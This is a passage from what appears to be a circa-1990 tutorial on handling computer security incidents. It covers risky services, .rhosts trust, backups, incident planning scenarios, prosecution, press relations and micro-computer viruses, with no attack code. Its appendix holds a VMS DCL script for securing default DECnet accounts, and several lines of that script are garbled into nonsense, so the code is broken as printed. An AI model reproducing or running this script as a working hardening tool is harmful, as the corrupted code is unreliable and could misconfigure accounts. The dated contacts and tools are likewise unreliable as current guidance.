short program that increases the job priority of a job while
it is making a directory so as to make it more difficult to
exploit this hole.

YP & NFS. Both present giant security holes. It is important to
arrange to get patches as soon as they become available for
these subsystems because we can expect more security
problems with them in the future. Sun has recently started
a computer security group that will help solve this set of
problems.

While the ambitious and dedicated system manager is encouraged to
fix all of the security problems that exist, fixing these few
will discourage most of the attackers.

23

2.7 New Security Holes

New security holes are always being found. There are a number of
computer mailing lists and advisory groups the follow this.
Three groups of particular interest are CERT, ZARDOZ and CIAC.

2.7.1 CERT

Cert is a DARPA sponsored group to help internet sites deal with
security problems. They may be contacted as
cert@cert.sei.cmu.edu. They also maintain a 24 hour phone number
for security problems at (412) 268-7090.

2.7.2 ZARDOZ

Neil Gorsuch moderates a computer security discussion group. He
may be contacted as zardoz!security-request@uunet.UU.NET
or security-request@cpd.com.

2.7.3 CIAC

CIAC is the Department of Energy’s Computer Incident Advisory
Capability team led by Gene Schultz. This team is interested in
discovering and eliminating security holes, exchanging security
tools, as well as other issues. Contact CIAC as
ciac@tiger.llnl.gov.

2.8 Excess Services

Every extra network service that a computer offers potentially
poses an additional security vulnerability. I am emphatically
not suggesting that we remove those services that the users are
using, I am encouraging the removal of services that are unused.
If you are not getting a benefit from a service, you should not
pay the price in terms of system overhead or security risk.
Sometimes, as with rexecd under unix, the risks are not
immediately apparent and are caused by unexpected interactions
that do not include any bugs per se.

24

2.9 Search Paths

If a user has set his search path to include the current
directory (“.” on Unix), he will almost always eventually have
a serious problem. There are a number of security
vulnerabilities that this poses as well as logistical ones.
Searching through the all of the users initialization files
and/or through the process table (with ps -e on unix) can detect
this problem.

2.10 Routing

Routing can provide a cheap partial protection for a computer
center. There are some machines that don’t need to talk to the
outside world at all. On others, one would might like to be able
to initiate contact outward but not have any real need to allow
others to contact this machine directly.

In an academic computer when administrative computers are placed
on same network as the student machines, limiting routing is
often a very good idea. One can set up the system such that the
users on administrative machines can use the resources of the
academic machines without placing them at significant risk of
attack by the student machines.

Ideally one would wish to place the machines that need to be
protected on their own local area net with active routers to
prevent an attacker from “listening in” on the broadcast net.
This type of an attack is becoming increasingly popular.

2.11 Humans

In almost all technological systems, the weakest link is the
human beings involved. Since the users, the installers and the
maintainers of the system are (in the average case) all humans,
this is a serious problem.

2.11.1 Managers

Managers, bosses, center directors and other respected people are
often given privileged accounts on a variety of machines.
Unfortunately, they often are not as familiar with the systems as

25

the programmers and system maintainers themselves. As a result,
they often are the targets of attack. Often they are so busy
that do not take the security precautions that others would take
and do not have the same level of technical knowledge. They are
given these privileges as a sign of respect. They often ignore
instructions to change passwords or file protections

The attackers rarely show this level of respect. They break into
the unprotected managerial account and use it as a vector to the
rest of the system or center. This leads to an embarrassing
situations beyond the break-in itself as the manager is made to
look personally incompetent and is sometimes accused of being
unfit for his position.

Prevent this type of situation form occurring by giving
privileges only to people that need and know how to use them.

2.11.2 Secretaries

Secretaries are often give their bosses passwords by their
bosses. When a secretary uses his bosses account, he has all the
privileges that his boss would have and generally does not have
the training or expertise to use them safely.

It is probably not possible to prevent bosses from giving their
passwords to their secretaries. Still one can reduce the need
for this by setting up groups correctly. One might consider
giving “bosses” two separate accounts one for routine use and
one for privileged access with a hope that they will only share
the former with their secretary.

2.11.3 Trojan Horses

Having an “unsupported” or “public” area on disk where users
place binaries for common use simplifies the placement of Trojan
horse programs. Having several areas for user maintained
binaries and a single user responsible for each reduces but does
not eliminate this problem.

2.11.4 Wizards

Wizards and system programmers often add their own security
problems. They are often the ones to create privileged programs

26

that are needed and then forgotten about without being disabled.
Thinking that an account doesn’t need to be checked/audited
because it is owned by someone that should know better than to
make a silly mistake is a risky policy.

2.11.5 Funders

Funders are often giving accounts on the machines that they
“paid for.” All to often these accounts are never used but not
disabled even though they are found to be dormant by the
procedures discussed above. Again, this is a mistake to be
avoided.

2.12 Group Accounts

A group account is one that is shared among several people in
such a way that one can’t tell which of the people in the group
is responsible for a given action.

Those of you familiar with Hardin’s “The Tragedy of The Common”
will understand that this is a problem in any system computer or
otherwise. Part of the problem here is with passwords.

1. You can’t change the password easily. You have to find
everyone in the group to let them know.
2. If something Dumb happens you don’t know who to talk to
about it.

3. If someone shares the group password with another person,
you can never find out who did or who all the people who
knew the password were.

Group accounts should always be avoided. The administrative work
to set up several independent accounts is very small in
comparison to the extra effort in disaster recovery for not doing
so.

One must not only avoid the explicit group accounts, but also the
implicit ones. This is where an individual shares his password
with dozens of people or allows dozens, perhaps hundreds of them
to use his through proxy logins or .rhosts.

27

2.13 .rhosts and proxy logins

Just as some people trust each other, some accounts trust each
other and some machines trust each other. There are several
mechanism for setting up a trust relationship. Among these are
hosts.equiv, .rhosts, and proxy logins.

These mechanisms essentially allow a user to login from one
machine to another without a password. There are three basic
implications to this.

1. If you can impersonate a machine, you can gain access to
other machines without having to provide passwords or find
bugs.
2. Once you get access to one account on one machine, you are
likely to be able to reach many other accounts on other
machines.

3. If you gain control of a machine, you have gained access to
all the machines that trusts it.

Various experiments have shown that by starting almost anywhere
interesting, once one has control of one medium size machine, one
can gain access to tens of thousands of computers. In my most
recent experiment, starting from a medium size timesharing
system, I gained immediate access to 150 machines and surpassed
5000 distinct machines before completing the second recursion
step.

2.14 Debugging

About one third of the security holes that I have come across
depend on a debugging option being enabled. When installing
system software, always check that all the “debugging” options
that you are not using are disabled.

2.15 Getting People Mad at You

It is sad but true that a small number of sites have gotten
groups of hackers angry at them. In at least two cases, this was
because the hackers had found an interesting security hole, had

28

tried to contact the administrators of the center and were given
a hard time when they were seriously trying to help.

When one is given a “tip” from someone that won’t identify
themselves about a security problem, it is generally worth
investigating. It is not worth trying to trick the informant
into giving his phone number to you. It almost never works, and
it is the “type of dirty trick” that will probably get people
mad at you and at the very least prevent you from getting early
warnings in the future.

29

3 Pre-Planning your Incident Handling

3.1 Goals

Despite your best plans to avoid incidents they may very well
occur. Proper planning can reduce their serverity, cost and
inconvenience levels. There are about half dozen different goals
that one can have while handling an incident.

1. Maintain and restore data.
2. Maintain and restore service.

3. Figure out how it happenned.

4. Avoid the future incidents and escalation.
5. Avoid looking foolish.

6. Find out who did it.

7. Punish the attackers.

The order shown above is what I believe the order of priorities
generally should be. Of course in a real situation there are
many reasons why this ordering might not be appropriate and we
will discuss the whens and why of changing our priorities in the
next section.

For any given site, one can expect that a standard goal
prioritization can be developed. This should be done in advance.
There is nothing so terrible as being alone in a cold machine
room at 4 on a Sunday morning trying to decide whether to shut
down the last hole to protect the system or try to get a phone
trace done to catch the attacker. It is similarly difficult to
decide in the middle of a disaster whether you should shut down a
system to protect the existing data or do everything you can to
continue to provide service.

Noone who is handling the technical side of an incident wants to
make these policy decisions without guidance in the middle of a
disaster. One can be sure that these decisions will be replayed
an re-analyzed by a dozen “Monday Morning Quarterbacks” who
will explain what should have been done could not be bothered to
make up a set of guidelines before.

Let us look at each of these goals in a little more detail.

30

3.1.1 Maintaining and restoring data

To me, the user data is of paramount importance. Anything else
is generally replacable. You can buy more disk drives, more
computers, more electrical power. If you lose the data, though a
security incident or otherwise, it is gone.

Of course, if the computer is controlling a physical device,
there may be more than just data at stake. For example, the most
important goal for the computer in Pacemaker is to get the next
pulse out on time.

In terms of the protection of user data, there is nothing that
can take the place of a good back-up strategy. During the week
that this chapter was written, three centers that I work with
suffered catastrophic data loss. Two of the three from air
conditioning problems, one from programmer error. At all three
centers, there were machines with irreplacable scientific data
that had never been backed up in their lives.

Many backup failures are caused by more subbtle problems than
these. Still it is instructive to note that many sites never
make a second copy of their data. This means than any problem
from a defective disk drive, to a water main break, to a typing
mistake when updating system software can spell disaster.

If the primary goal is that of maintaining and restoring data,
the first thing to do during an incident needs to be to check
when the most recent backup was completed. If it was not done
very recently, an immediate full system dump must be made and the
system must be shutdown until it is done. Of course, one can’t
trust this dump as the attacker may have already modified the
system.

3.1.2 Maintaining and restoring service

Second to maintaining the data, maintaining service is important.
Users have probably come to rely on the computing center and will
not be pleased if they can’t continue to use it as planned.

3.1.3 Figuring how it happenned

This is by far the most interesting part of the problem and in
practice seems to take precident over all of the others. It of

31

course strongly conflicts with the two preceeding goals.

By immediately making a complete copy of the system after the
attack, one can analyze it at one’s leisure. This means that we
don’t need to worry about normal use destroying evidence of about
the attacker re-entering to destroy evidence of what happenned.

Ultimately, one may never be able to determine how it happenned.
One may find several ways that “could have happenned”
presenting a number of things to fix.

3.1.4 Avoiding the Future Incidents and Escalation

This needs to be an explicit goal and often is not realized until
much too late. To avoid future incidents one of course should
fix the problem that first occurred and remove any new security
vulnerabilities that were added either by the attackers or by the
system staff while trying to figure out what was going on.

Beyond this, one needs to prevent turning a casual attacker who
may not be caught into dedicate opponent, to prevent enticing
other attackers and to prevent others in one’s organization and
related organizations from being forced to introduce restrictions
that would be neither popular nor helpful.

3.1.5 Avoiding looking foolish

Another real world consideration that I had not expected to
become an issue is one of image management. In practice, it is
important not to look foolish in the press, an issue that we will
discuss more fully in an appendix. Also it is important for the
appropriate people within the organization to be briefed on the
situation. It is embarrising to find out about an incident in
one’s own organization from a reporter’s phone call.

3.1.6 Finding out who did it

This goal is often over emphasized. There is definitely a value
in knowing who the attacker was so that one can debrief him and
discourage him from doing such things in the future.

In the average case, it effort to determine the attackers
identity than it is worth unless one plans to prosecute him.

32

3.1.7 Punishing the attackers

This merits of this goal have been seriously debated in the past
few years. As a practical matter it is very difficult to get
enough evidence to prosecuter someone and very few succesful
prosecutions. If this is a one of the goals, very careful record
keeping needs to be done at all times during the investigation,
and solving the problem will be slowed down as one waits for
phone traces and various court orders.

3.2 Backups

It should be clear that accomplishing most of the goals requires
having extra copies of the data that is stored on the system.
These extra copies are called “Backups” and generally stored on
magnetic tape.

Let us consider two aspects of keeping backup copies of your
data. First, we will look at why this important and what the
backups are used for and then we will examine the charateristics
of a good backup strategy.

3.2.1 Why We Need Back Ups

Good back ups are needed for four types of reasons. The first
three of these are not security related per se, though an
insufficeint back up strategy will lead to problems with these
first three as well.

If a site does not have a reliable back up system, when an
incident occurs, one must seriously consider immediate shutdown
of the system so as not to endanger the user data.

User Errors. Every once in a while, a user delete a file or
overwrites data and then realizes that he needs it back. In
some operating systems, “undelete” facilities or version
numbering is enough to protect him, if he notices his
mistake quickly enough. Sometimes he doesn’t notice the
error for a long time, or deletes all of the versions, or
expunges them and then wants the data back.
If there is no backup system at all, the users data is just
plain lost. If there is a perfect backup system, he quickly
is able to recover from his mistake. If there is a poor

33

back up system, his data may be recovered in a corrupted
form or with incorrect permission set on it.

There have been cases where back up systems returned data
files to be publically writeable and obvious problems have
ensued from it. Perhaps as seriously, there are sites that
have stored all of the back up data in a publically readable
form, including the data that was protected by the
individual user.
System Staff Errors. Just as users make mistakes, staff members
do as well. In doing so, they may damage user files, system
files or both. Unless there is a copy of the current system
files, the staff must restore the system files from the
original distribution and then rebuild all of the site
specific changes. This is an error prone process and often
the site specific changes including removing unwanted
debugging features that pose security vulnerabilities.

Hardware/Software Failures. Hardware occassionally fails. If the
only copy of the data is on a disk that has become
unreadable it is lost. Software occasionally fails. Given
a serious enough error, it can make a disk unreadable.

Security Incidents. In this document, our main concern is with
security incidents. In determining what happen and
correcting it, backups are essential.
Basically, one would like to return every file to the state
before the incident except for those that are being modified
to prevent future incidents. Of course, to do this, one
needs a copy to restore from. Naively, one would think that
using that modification date would allow us to tell which
files need to be updated. This is of course not the case.
The clever attack will modify the system clock and/or the
timestamps on files to prevent this.
In many attacks, at one the following types of files are
modified.

? The system binary that controls logging in.
? The system authorization file lists the users and their
privileges.

? The system binary that controls one or more daemons.
? The accounting and auditing files.
? User’s startup files and permission files.

? The system directory walking binary.

Now that we understand why we need back ups in order to recover

34

3.2.2 How to form a Back Up Strategy that Works

There are a few basic rules that provide for a good backup
strategy.

? Every file that one cares about must be included.
? The copies must be in non-volitile form. While having two
copies of each file, one on each of two separate disk drives
is good for protection from simple hardware failures, it is
not defense from an intelligent attacker that will modify
both copies, of from a clever system staffer who saves time
by modifying them both at once.

? Long cycles. It may take weeks or months to notice a
mistake. A system that reuses the same tape every week will
have destroyed the data before the error is noticed.

? Separate tapes. Overwriting the existing backup before
having the new one completed is an accident waiting to
happen.
? Verified backups. It is necessary to make sure that one can
read the tapes back in. One site with a programming bug in
its back up utility had a store room filled with unreadable
tapes!

3.3 Forming a Plan

While the first major section (avoidance) contained a lot of
standard solutions to standard problems, planning requires a
great deal more thought and consideration. A great deal of this
is list making.

Calls Lists. If there a system staffer suspects security incident
is happening right now, who he should call?
And if he gets no answer on that line?

What if the people are the call list are no longer employees
or have long since died?
What if it Christmas Day or Sunday morning?

Time–Distance. How long will it take for the people who are
called to arrive?
What should be done until they get there?

35

This a user notices. If a user notices something odd, who should
he tell?

How does he know this?
Threats and Tips. What should your staffers do if they receive a
threat or a tip-off about a breakin?

Press. What should a system staffer do when he receives a call
from the press asking about an incident that he, himself
doesn’t know about?
What about when there is a real incident underway?

Shutting Down. Under what circumstances should the center be
shutdown or removed from the net?
Who can make this decision?

When should service be restored?
Prosecution. Under what circumstances do you plan to prosecute?

Timestamps. How can you tell that the timestamps have been
altered?
What should you do about it?

Would running NTP (the network time protocal) help?
Informing the Users. What do you tell the users about all this?

List Logistics. How often to you update the incident plan?
How does you system staff learn about it?

3.4 Tools to have on hand

File Differencing Tools

Netwatcher

Spying tools

Backup Tapes

Blanks Tapes

Notebooks

36

3.5 Sample Scenarios to Work on in Groups

In order to understand what goal priorities you have for you
center and as a general exercise in planning, let us consider a
number of sample problems. Each of these is a simplified version
of a real incident. What would be appropriate to do if a similar
thing happenned at your center? Each new paragraph indicates new
information that is received later.

? A system programmer notices that at midnight each night,
someone makes 25 attempts to guess a username–password
combination
Two weeks later, he reports that each night it is the same
username–password combination.

? A system programmer gets a call reporting that a major
underground cracker newsletter is being distributed from the
administrative machine at his center to five thousand sites
in the US and Western Europe.
Eight weeks later, the authorities call to inform you the
information in one of these newsletters was used to disable
“911” in a major city for five hours.

? A user calls in to report that he can’t login to his account
at 3 in the morning on a Saturday. The system staffer can’t
login either. After rebooting to single user mode, he finds
that password file is empty.
By Monday morning, your staff determines that a number of
privileged file transfer took place between this machine and
a local university.
Tuesday morning a copy of the deleted password file is found
on the university machine along with password files for a
dozen other machines.

A week later you find that your system initialization files
had been altered in a hostile fashion.
? You receive a call saying that breakin to a government lab
occurred from one of your center’s machines. You are
requested to provide accounting files to help trackdown the
attacker.

A week later you are given a list of machines at your site
that have been broken into.
? A user reports that the last login time/place on his account
aren’t his.

37

Two weeks later you find that your username space isn’t
unique and that unauthenticated logins are allowed between
machines based entirely on username.

? A guest account is suddenly using four CPU hours per day
when before it had just been used for mail reading.
You find that the extra CPU time has been going into
password cracking.

You find that the password file isn’t one from your center.
You determine which center it is from.

? You hear reports of computer virus that paints trains on
CRT’s.
You login to a machine at your center and find such a train
on your screen.
You look in the log and find not notation of such a feature
being added.

You notice that five attempts were made to install it within
an hour of each before the current one.
Three days later you learn that it was put up by a system
administrator locally who had heard nothing about the virus
scare or about your asking about it.

? You notice that your machine has been broken into.
You find that nothing is damaged.
A high school student calls up and apologizes for doing it.

? An entire disk partition of data is deleted. Mail is
bouncing bouncing because the mail utilities was on that
partition.
When you restore the partition, you find that a number of
system binaries have been changed. You also notice that the
system date is wrong. Off by 1900 years.

? A reporter calls up asking about the breakin at your center.
You haven’t heard of any such breakin.
Three days later you learn that there was a breakin. The
center director had his wife’s name as a password.

? A change in system binaries is detected.
The day that it is corrected they again are changed.

This repeats itself for some weeks.

38

4 Incident Handling

The difficulty of handling an incident is determined by several
factors. These include the level of preparation, the sensitivity
of the data, and the relative expertise levels of the attacker(s)
and the defender(s). Hopefully, preliminary work in terms of
gathering tools, having notification lists, policies and most
importantly backup tapes, will make the actual handling much
easier.

This section is divided into three parts. The first of these
deal with general principles. The second presents some
particular (simple) techniques that have proven useful in the
past. Finally, the third section presents a description of a
simulation exercise based a set of real attacks.

4.1 Basic Hints

There are a number of basic issues to understand when handling a
computer incident. Most of these issues are present in handling
most of these issues and techniques are relevant in a wide
variety of unusual and emergency situations.

4.1.1 Panic Level

It is critical to determine how much panic is appropriate. In
many cases, a problem is not noticed until well after it has
occurred and another hour or day will not make a difference.

4.1.2 Call Logs and Time Lines

All (or almost all) bad situations eventually come to an end. At
that point, and perhaps at earlier points, a list of actions and
especially communications is needed to figure out what happened.

4.1.3 Accountability and Authority

During an incident it is important to remind people what
decisions they are empowered to make and what types of decisions
that they are not. Even when this is explicitly discussed and

39

formulated in a contingency plan, people have a tendency to
exceed their authorities when they are convinced that they know
what should be done.

4.1.4 Audit Logs

Audit logs need to be copied to a safe place as quickly as
possible. It is often the case that an attacker returns to a
computer to destroy evidence that he had previously forgotten
about.

4.1.5 Timestamps

The second most powerful tool (second only to backup tapes) in an
incident handlers arsenal is timestamps. When in doubt as to
what to do, try to understand the sequencing of the events. This
is especially true when some of the actions will change the value
on the system clock.

4.2 Basic Techniques

There are five basic sets of techniques for understanding what
has happened.

4.2.1 Differencing

Differencing is that act of comparing the state of a part of the
computer system to the state that it was in previously. In some
cases we have compared every executable system file with the
corresponding file on the original distribution tape to find what
files the attacker may have modified. Checksums are often used
to decrease the cost of differencing. Sometimes people look only
for differences in the protection modes of the files.

4.2.2 Finding

Finding is generally cheaper than differencing. Finding is the
act of looking at a part of a computer system for files that have
been modified during a particular time or have some other
interesting property.

40

4.2.3 Snooping

Snooping is the act of placing monitors on a system to report the
future actions of an attacker. Often a scripting version of the
command line interpreter is used or a line printer or PC is
spliced in to the incoming serial line.

4.2.4 Tracking

Tracking is the use of system logs and other audit trails to try
to determine what an attacker has done. It is particularly
useful in determining what other machines might be involved in an
incident.

4.2.5 Psychology

A wide range of non-technical approaches have been employed over
the years with an even wider range of results. Among these
approaches have been leaving messages for the attacker to find,
starting talk links, calling local high school teachers, etc.

4.3 Prosecution

Prosecution has historically been very difficult. Less than a
year ago, the FBI advised me that it was essentially impossible
to succeed in a prosecution. More recently, FBI agent Dave
Icove, (icove@dockmaster.cnsc.mil, 703–640–1176) has assured me
that the FBI will be taking a more active role in the prosecution
of computer break-ins and has expressed interest in lending
assistance to investigation where prosecution is appropriate.

4.4 Exercise

The bulk of this class hour is reserved for an incident handling
simulation. A facility will be described. A consensus policy
for incident handling will be agreed upon and then the simulation
will begin.

During the simulation, the effects of the attackers actions and
those of third parties will be described. The participants can

41

choose actions and take measurements and will be informed of the
results of those actions and measurements. In a sufficiently
small working group that had several days, we would run a
software simulation; but as many of the actions take hours (ega
full system comparison to the original distribution), we will
proceed verbal in the short version of this workshop.

42

5 Recovering From Disasters

Incident recovery is the final portion of the of the incident
handling process. Like the other portions of incident handling,
it is not particularly difficult but is sufficiently intricate to
allow for many errors.

Telling everyone that is over. For a large incident, it is not
unusual to have contacted people at a dozen or more sites.
It is important to let everyone know that you are done and
to be sure to give your colleagues the information that they
need. It is also important that your staff knows that
things are over so that they can return to normal work.
Generally a lot of people need to thanked for the extra
hours and effort that they have contributed.
Removing all Tools. Many of the tools that were installed and
using during an incident need to removed from the system.
Some will interfere with performance. Others are worth
stealing by a clever attacker. Similarly a future attacker
that gets a chance to look at the tools will know a lot
about how you are going to track him. Often extra accounts
are added for handling the incident. These need to be
removed.

File and Service Restoration. Returning the file system to a
“known good state” is often the most difficult part of
recovery. This is especially true with long incidents.

Reporting Requirements. Often, especially if law enforcement
agencies have become involved, a formal report will be
required.
History. After everything is over, a final reconstruction of the
events is appropriate. In this way, everyone on your staff
is telling the same story.

Future Prevention. It is important to make sure that all of the
vulnerabilities that were used in or created the incident
are secured.

Just after an incident, it is likely to be a good time to create
sensible policies where they have not existed in the past and to
request extra equipment or staffing to increase security.
Similarly, it is a logical time for someone else to demand
stricter (nonsensical) policies to promote security.

43

A Micro Computers

While the bulk of this book and class has concerned multi-user
computers on networks, micro computers are also worth some
attentions.

Basically there are four issues that cause concern.

Shared Disks. In many settings, micro computers are shared among
many users. Even if each user brings his own data, often
the system programs are shared on communal hard-disk,
network or library or floppies. This means that a single
error can damage the work of many people. Such errors might
include destruction of a system program, intentional or
accidental modification of a system program or entry of a
virus.
To combat this, systematic checking or reinstallation of
software from a known protected source is recommended. In
most shared facilities, refreshing the network, hard-disk or
floppy-library weekly should be considered. Shared floppies
should be write protected and the original copies of
programs should be kept under lock and key and used only to
make new copies.
Trusted server the provide read only access to the system
files have been successfully used in some universities. It
is absolute critical that these machines be used only as
servers.

Viruses. A number of computer viruses have been found for
micro-computers. Many experts consider this problem to be
practically solved for Macintoshes an soon to be solved for
IBM-style PC’s.
Two basic types of anti-viral software are generally
available. The first type is installed into the operating
and watches for virus’s trying to infect a machine.
Examples of this on the Mac include Semantic’s SAM (Part 1),
Don Brown’s vaccine and Chris Johnson’s Gate Keeper.
The second type of anti-viral software scans the disk to
detect and correct infected programs. On the Mac, SAM (Part
2), H. G. C. Software’s Virex, and John Norstab’s Disinfinct
are commonly used disk scanners.

On the PC type of machines we find three types of virus.
The first of these is a boot sector virus that alters the
machine language start up code found on the diskette. The
second infects the command.com startup file and the third
alters the exe (machine language executable files).

44

Flu Shot Plus by Ross Greenberg is an example of a program
to deal with command.com & some exe virus. Novirus and
cooperatively built by Yale, Alemeda and Merit is one of the
boot track repair systems.
There are a number of electronic discussion groups that deal
with computer virus. On BITNET (and forwarded to other
networks), virus-l supports discussion about PC and Mac
virus, while valert is used to announce the discovery of new
ones. Compuserve’s macpro serves as a forum to discuss
Macintosh viruses.

Network. The third is issue is the placement of single user
computers on networks. Since there is little or no
authentication on (or of) these machines, care must be taken
to not place sensitive files upon them in such a
configuration.

Reliability. Finally there is a reliability issue. Most single
user computers were never designed for life and time
critical applications. Before using such a computer in such
an application, expert advise should be sought.

In the use of single user computers, there are some basic issues
that need be considered and some simple advice that should be
given.

In the advice column, there are a few basic points.

1. Where practical, each user should have his own system disks
and hence be partially insulated from potential mistakes.
2. When people are sharing disks have an explicit check out
policy logging the users of each disk. Be sure to set the
write-protect them and teach the users how to write protect
there own system disks. (Most PC programs are sold on
write-protected disks, this is not true of most Macintosh
programs.

3. Keep a back up copy of all system programs and system
programs to allow for easy restoration of the system.
4. Write lock originals and keep them under lock and key for
emergency use only.

5. Have an explicit policy and teach users about software theft
and software ethics.

6. Teach users to back up their data. Just as with large
computers, the only real defense from disaster is
redundancy.

45

Even when the computer center is not providing the machines
themselves, it should generally help to teach users about
backups, write protection, software ethics and related issues.
Most PC users do not realize that they are their own system
managers and must take the responsibility of care for their
systems or risk the consequences.

46

B VMS Script

This script is courtesy of Kevin Oberman of Lawrence Livermore
National Labs. It is used on DEC VMS systems to close a number
of the standard created by the normal installation of DECNET.
Rather than typing this in by hand, please request one by
electronic mail. This DCL script is provided for reference
purposes only and is not guaranteed or warranted in any way.

$ Type SYS$INPUT

countpandedure changes the password for the default DECnet ac-
sets up a new account for FAL activity. It prevents unautho-
rized users
from making use of the default DECnet account for any pur-
pose except
file transfer.

This procedure assumes a default DECnet account named DECNET us-
ing a
directory on SYS$SYSROOT. If this is not the case on this sys-
tem, do
readypinceed! It will use UIC [375,375]. If this UIC is al-
use, do not continue.

$ Read/End=Cleanup/Prompt=”Continue [N]: ” SYS$COMMAND OK
$ If .NOT. OK Then Exit
$ Say := “Write SYS$OUTPUT”
$ Current_Default = F$Environment(“DEFAULT”)
$ Has_Privs = F$Priv(“CMKRNL,OPER,SYSPRV”)
$ If Has_Privs Then GoTo Privs_OK
$ Say “This procedure requires CMKRNL, OPER, and SYSPRV.”
$ Exit
$POnvControl_Y Then GoTo Cleanup
$ On Error Then GoTo Cleanup
$ Set Terminal/NoEcho
$ Read/End=Cleanup/Prompt=”Please enter new default DECnet pass-
word: ” –
SYS$Command DN_Password
$ Say ” ”
$ If F$Length(DN_Password) .GT. 7 Then GoTo DN_Password_OK
$ Say “Minimum password length is 8 characters”
$ GoTo Privs_OK
$DN_Password_OK:
$ Sayd”E”d=Cleanup/Prompt=”Enter new FAL password: ” SYS$COMMAND FAL_Password
$ If F$Length(FAL_Password) .GT. 7 Then GoTo FAL_Password_OK

47

$ Say “Minimum password length is 8 characters”
$ GoTo DN_Password_OK
$FAL_Password_OK:
$ Set Terminal/Echo
$ Type SYS$INPUT

The FAL account requires a disk quota. This quota should be large
enough to accomodate the the files typically loaded into this account.
formldefaultqouta be exhausted, the system will fail to per-
DECnet file transfers.

It is also advisable to clear old files from the direc-
tory on a daily
basis.

$ If .NOT. F$GetSYI(“CLUSTER_MEMBER”) Then GoTo Not_Cluster
$ Say “This system is a cluster member.
$ Read/Prom=”Has this procedure already been run on another clus-
ter member: “-
$ IfSClusterCTheneGoTo No_Create
$Not_Cluster:
$ Read/End=Cleanup –
/Prompt=”Disk quota for FAL account (0 if quotas not en-
abled): ” –
SYS$COMMAND Quota
$ If F$Type(Quota) .EQS. “INTEGER” Then GoTo Set_Quota
$ Say “Diskquota must be an integer”
$ GoTo FAL_Password_OK
$Set_Quota:
$ Say “Setting up new FAL account.”
$ Set NoOnult SYS$SYSTEM
$ UAF := “$Authorize”
$ UAF Copy DECNET FAL/Password=’FAL_Password’/UIC=[375,375]/Directory=[FAL]
$ Create/Directory SYS$SYSROOT:[FAL]/Owner=[FAL]
$No_Create:
$ NCP := “$NCP”
$ NCP Define Object FAL USER FAL Password ‘FAL_Password’
$ NCP Set Object FAL USER FAL Password ‘FAL_Password’
$ If (Quota .eq. 0) .OR. Cluster Then GoTo NO_QUOTA
$ Say “Entering disk quota for FAL account.
$ Set Default SYS$SYSTEM
$ Open/WritetQuota”SET_QUOTA’PID’.COM
$ Write Quota “$ Run SYS$SYSTEM:DISKQUOTA”
$ Write Quota “Add FAL/Perm=”Quota'”
$ Close Quota
$ @SET_QUOTA’PID’
$ Delete SET_QUOTA’PID’.COM;
$No_Quota:

48

$ Say “Resetting default DECNET account password”
$ NCP Define Executor Nonpriv Password ‘DN_Password’
$ NCP Set Executor Nonpriv Password ‘DN_Password’
$ UAF Modify DECNET/Password=’DN_Password’
$Cleanup:
$ Set Default ‘Current_Default’
$ Set Terminal/Echo
$ Exit

49

C Highly Sensitive Environments

An computing environment should be considered highly sensitive
when it is potentially profitable to covert the data or when
great inconvenience and losses could result from errors produced
there. In particular, you should consider you site sensitive if
any of the following conditions apply:

1. You process data that the government considers sensitive.
2. You process financial transactions such that a single
transaction can exceed $25,000.00 or the total transactions
exceed 2.5 Million dollars.

3. You process data whose time of release is tightly controlled
and whose early release could give significant financial
advantage.

4. Your function is life critical.
5. Your organization has enemies that have a history of
“terrorism” or violent protests.

6. Your data contains trade secrete information that would be
of direct value to a competitor.

Essentially money is more directly valuable than secrets and a
“vilian” can potentially steal more from one successful attack
on one financial institution than he will ever be able to get
selling state secrets for decades. There is significant concern
that the electrical utility companies and and bank conducting
electronic funds transfer will be targets of terrorists in thee
next decade.

For centers the must support sensitive processing it is strongly
advised to completely separate the facilities for processing this
data from those facilities used to process ordinary data and to
allow absolutely no connection from the sensitive processing
systems to the outside world. There is No substitute for
physical security and proper separation will require an attacker
to compromise physical security in order to penetrate the system.
Techniques for coping with the remaining “insider threat” are
beyond the scope of this tutorial.

In analysis of computing in sensitive environments, there are two
different security goals. The first is that of protecting the
system. All of the advice in this booklet should be considered

50

as a first step towards that goal. The second goal is the
protection of job or “Technical Compliance.” This is is the
goal of showing that all of the regulations have been followed
and that protecting the system has been done with “due
diligence.”

It is important to realize that these two security goals are
separate and potentially conflicting. It may be necessary to
work towards the latter the goal and that is often more a legal
and bookkeeping question than a technical one. It is also beyond
the scope of this work.

51

D Handling the Press

Often media inquiries can absorb more time than all of the others
issues in incident handling combined. It is important to
understand this and to use your public affairs office if it
exists. In the excitement, people, especially those who are not
experience speakers will often forget that they are not empowered
to speak for the center and that nothing is ever really said,
“Off the record.”

D.1 Spin Control

The phrase “Spin Control” was first used in political circles.
It refers to altering the perceptions about an incident rather
than the delaying with the facts of the incident themselves.
Consider the two statements.

1. To keep our machines safe, we decided to disconnect them
from the network.
2. We were forced to shut down our network connections to
prevent damage to our machines.

I have found that the giving the press a state like the former
tends to produce a laudatory piece about one’s staff while a
statement like the latter, produces an embarrassing piece. The
two statements are of course essentially identical.

Your public affairs group is probably familiar with these issues
and can help you form press statements

D.2 Time Control

With a sufficiently large incident, the media attention can
absorb almost unbounded amounts of time. The press will often
call employees at home. It is important the staff that are
solving a problem understand that the solving the incident is
more important that dealing with the press. At the very least
insist that all press representatives go through the public
affairs often so that the standard questions can be easily and
time-efficiently be answered.

52

D.3 Hero Making

The press likes to find outstanding heroes and villains. As a
result, the media will tend to make one of your staff members
into a hero if at all possible from them to do so. It is more
likely than not that the Hero will not be the person who has
worked the hardest or the longest.

D.4 Discouraging or Encouraging a Next Incident

The attention that an incident receives greatly affect the
likelihood of future incidents at that particular site. It
probably also influences the decision process or potential future
crackers in the community at large. Claiming that your site is
invulnerable is an invitation to a future incident. Giving the
media step by step instructions on how to break in to a computer
is also not a wonderful idea.

I (personally) suggest stressing the hard work of your staff and
the inconvenience to the legitimate users and staff members. To
the extent practical portray the cracker as inconsiderate and
immature and try to avoid making him seem brilliant at one
extreme or the attack seem very simple at the other.

D.5 Prosecution

If you considering prosecution, you need to consult with your
legal counsel and law enforcement official for advise on press
handling.

D.6 No Comment

One common strategy for avoiding (or at least bounding) time loss
with the press is to simply decline to comment on the situation
at all. IF you are going to adopt this approach, your public
affairs office can advise you on techniques to use. It is
important to tell everyone who is involved in the incident that
they should not discuss the situation; otherwise people will leak
things accidently. Also, without correct information from your
center, the press may print many inaccurate things that represent
their best guesses.

53

D.7 Honesty

I recommend against trying to mislead the press. It is hard to
keep a secret forever and when and if the press finds that you
have lied to them, the negative coverage that you may receive
will probably far exceed the scope of the actual incident.

54

E Object Code Protection

To keep object code safe from human attackers and virus, a
variety of techniques may be employed.

Checksums. Saving the checksums of each of the system files in a
